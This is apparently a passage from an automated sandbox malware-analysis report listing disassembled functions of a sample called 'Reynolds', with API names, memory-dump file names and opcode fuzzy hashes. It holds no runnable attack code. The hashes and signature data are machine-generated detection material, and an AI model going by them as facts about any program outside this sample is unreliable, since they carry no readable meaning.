                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction ID: 5ba608dadfd17d34861672728dc34a08a30d2d85a4c81bfd86e03a3c82efa9cd
                                                                                                      • Opcode Fuzzy Hash: bf97d253b0b0f27bc9f8dee52e5b911b6d739ecbcd2cb4f6be9dea0dab631d0a
                                                                                                      • Instruction Fuzzy Hash: 4BF0A475A1AA46E1FF86AB51F440279A3B0EF88790FC51079E91F42674DE3DD446C710
                                                                                                      Function 00007FF7AA138844 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction ID: 6f81d1b64fd35e0cba06cf2e7a6877322a4b9bf65c547b250021e2a0d4d1a995
                                                                                                      • Opcode Fuzzy Hash: 6a55710d5b20bbebf70dcaf2af2ba2f9473b57b39f5035fa7bc312dbbbf193c7
                                                                                                      • Instruction Fuzzy Hash: 40A10866E0A782E5FBAA6F50F400379A6A1EF407A4F8646B5CA1D067E5DF7CD4068330
                                                                                                      Function 00007FF7AA12EB98 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                      • Instruction ID: 9d9921e65b69a7f61debe2fb149288cf364ec4c8a6832d3af2e4c756d2ac3e26
                                                                                                      • Opcode Fuzzy Hash: 49a97c8ce8b369b2f42047b1b1bb4140d0dd21c8d4100dd6dfdde4f7fa664e0d
                                                                                                      • Instruction Fuzzy Hash: 7E81C322E1A616E5F712BB65E440ABDAAB4BB40B44F8641B5DD0E166E5CF38E40BC730
                                                                                                      Function 00007FF7AA12E50C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 3659116390-0
                                                                                                      • Opcode ID: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                                                                                                      • Instruction ID: 985b83febe9ffd6fc072313dd0b7c38decd8fa5d47e7ba58eadf1b5d0d824dad
                                                                                                      • Opcode Fuzzy Hash: fa48a44f82e5a3751bdb722be5fb413316008f962baa66a44dfac203e8cd9eea
                                                                                                      • Instruction Fuzzy Hash: 35510132A19A51D9FB12DB25E4447ACBBB4FB44B98F498135DE4E077A8DF38D046C720
                                                                                                      Function 00007FF7AA132828 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                                                                                                      • Instruction ID: b8bf7f91175f5b99fe4c607c5de1f01b90da471ac182bf3f9a343c509eb03fde
                                                                                                      • Opcode Fuzzy Hash: 2e4cf0076cbdf12184df61fca722bc08e1e8edcc07d01b2398d8d0565b611ed0
                                                                                                      • Instruction Fuzzy Hash: EA51B431A0A692D5FAA6BF11F440179E6B5AF50BA0F964275DA7A076E4DE3CD402C330
                                                                                                      Function 00007FF7AA0F1990 Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4210589936-0
                                                                                                      • Opcode ID: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                                                                                                      • Instruction ID: 7be7899abf9684ecf68337048f2a4c73bbe00e00200da13945fb11ea50d324e1
                                                                                                      • Opcode Fuzzy Hash: 212ea22fed56076fe4411d7c93cd1191e07a29710201a96bd61674af69d79e6f
                                                                                                      • Instruction Fuzzy Hash: 5951E332B0A642DBF359EF31D54056AB764FB44754F410236EB29537A4DF38E4628720
                                                                                                      Function 00007FF7AA12B8BC Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 190572456-0
                                                                                                      • Opcode ID: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                                                                                                      • Instruction ID: 10684672f7321d23cab8f6666b1ecd766cd1b91619a2f3ab7779607f87db8584
                                                                                                      • Opcode Fuzzy Hash: a45d0f6615f049d54ccb6cd257a4a45fb43b8e31baabd57d5cfb2bdcd6727f95
                                                                                                      • Instruction Fuzzy Hash: 8641B561B1F642E1FE52AB05F880275E3A1BF487A0F8A4175DD5D4B3A4EE3CE4068310
                                                                                                      Function 00007FF7AA1A06D0 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$Enable
                                                                                                      • String ID:
                                                                                                      • API String ID: 2939132127-0
                                                                                                      • Opcode ID: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                                                                                                      • Instruction ID: 7d14172616083e23c628997823f958ac12e62115fed58cec587a8252d3c2bed0
                                                                                                      • Opcode Fuzzy Hash: bf1680c497ddafbed20fc8edb41bbefd3142ef2a208a4fb9b9f279baa3c2d0bd
                                                                                                      • Instruction Fuzzy Hash: 1C51A37290A682D5FBE2DB15E044238B7B0EB84B95FAA4075CA8D47770CE3DE843C720
                                                                                                      Function 00007FF7AA0F209C Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 3225163088-0
                                                                                                      • Opcode ID: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                                                                                                      • Instruction ID: 4ca668e1d72a262a85eca39c56ad339022b6420e157702de8dc94b1c4e540d10
                                                                                                      • Opcode Fuzzy Hash: 21f8d7a47469f2a49f07ab7fee508d90b20fe2808d7db8b1552c4b0775fa0cfc
                                                                                                      • Instruction Fuzzy Hash: 41316D7290A742DBF7A1AB01F84033AB7B0FB94B94F8601B9D64902670DF7DE456CB20
                                                                                                      Function 00007FF7AA121DD4 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2067211477-0
                                                                                                      • Opcode ID: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                                                                                                      • Instruction ID: dc842bf1fbd0e3e78a28ad03cf62900943c5dc68c8cc3d859392f6c397e5ea39
                                                                                                      • Opcode Fuzzy Hash: 41f6880fa826dc7585c1c84434b9e1d83cf5f40789d2fa38c65a87c25badbc06
                                                                                                      • Instruction Fuzzy Hash: D7216A75A0B742E6FE07EB61F8101B9E2B0AF84B94B8A4474DE4D03764DE3CE40A8720
                                                                                                      Function 00007FF7AA12F864 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _set_statfp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156100317-0
                                                                                                      • Opcode ID: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                                                                                                      • Instruction ID: 8da71b7e7af435d194447e31dd604e16f850f010aeeb0aefd231bb9c393e333a
                                                                                                      • Opcode Fuzzy Hash: ebe8654c569b7b411d1ff88ef690df32e320daa95c2d6a494747889ce22108c0
                                                                                                      • Instruction Fuzzy Hash: 8211E222E0A713E1F61A3324F152375D1616F41360F8B42B4F66E466FA8E1CE46A8BA1
                                                                                                      Function 00007FF7AA11508C Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2117695475-0
                                                                                                      • Opcode ID: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                                                                                                      • Instruction ID: a16a7ea01b1e362be8c5ac9895592b847c3c4fdefe40b061a40e24de4019e8ac
                                                                                                      • Opcode Fuzzy Hash: 5e575c077726398a46d38c0ab7510b231f7ab4447039ca8bf6b85c165a1961f5
                                                                                                      • Instruction Fuzzy Hash: A6116F90E0B147E5FA5777B1F5662B881B14F90768FC604BCE94D4A1E3ED1CA4478732
                                                                                                      Function 00007FF7AA16DF5C Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                      • String ID:
                                                                                                      • API String ID: 2833360925-0
                                                                                                      • Opcode ID: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                      • Instruction ID: 6c1ec7b473256887e500133fe1f85519cd0561532b044c3092e8b3e4c13dc34a
                                                                                                      • Opcode Fuzzy Hash: d1d48ba528d093844c112ef2a6b88edd344cae1c5bdc8ff2dee1276ed7d49edf
                                                                                                      • Instruction Fuzzy Hash: 8201F171A1EE02E1FB06AB30F49013AD370EF89784B9602BAE10F95470DF2CE4878721
                                                                                                      Function 00007FF7AA170740 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA170774
                                                                                                      • TerminateThread.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA17077F
                                                                                                      • WaitForSingleObject.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA17078D
                                                                                                      • ~SyncLockT.VCCORLIB ref: 00007FF7AA170796
                                                                                                        • Part of subcall function 00007FF7AA16FF10: CloseHandle.KERNEL32(?,?,?,00007FF7AA17079B,?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA16FF21
                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7AA13B91D,?,?,?,00007FF7AA101CE2), ref: 00007FF7AA1707A2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                      • String ID:
                                                                                                      • API String ID: 3142591903-0
                                                                                                      • Opcode ID: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                      • Instruction ID: f03f80d04f8bcf1410eefdc3fc65aa776c252872571671fc68e0466e06f4d346
                                                                                                      • Opcode Fuzzy Hash: 76932726eea5529e7fdc35515854e9fd5991f11f065ee08a39893390980189ab
                                                                                                      • Instruction Fuzzy Hash: C8016576A08B41E6E681AF09F44022DB370FB88BA4F904035DB8E43B64DF3CD892CB10
                                                                                                      Function 00007FF7AA121C30 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611280651-0
                                                                                                      • Opcode ID: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                      • Instruction ID: 6d5a746aed425f49f9c6e474ae1fadb14ad2f691fa273de41029206f4d191ee1
                                                                                                      • Opcode Fuzzy Hash: c939a99abec6306985d834238b453b49f76b24eaa75274ab5cb1e39e153e39a7
                                                                                                      • Instruction Fuzzy Hash: CB011274B0A642E2FA06BB60E544178A271EF80B74FD15779C67D026F5DF2CE45A8310
                                                                                                      Function 00007FF7AA0F2014 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2625713937-0
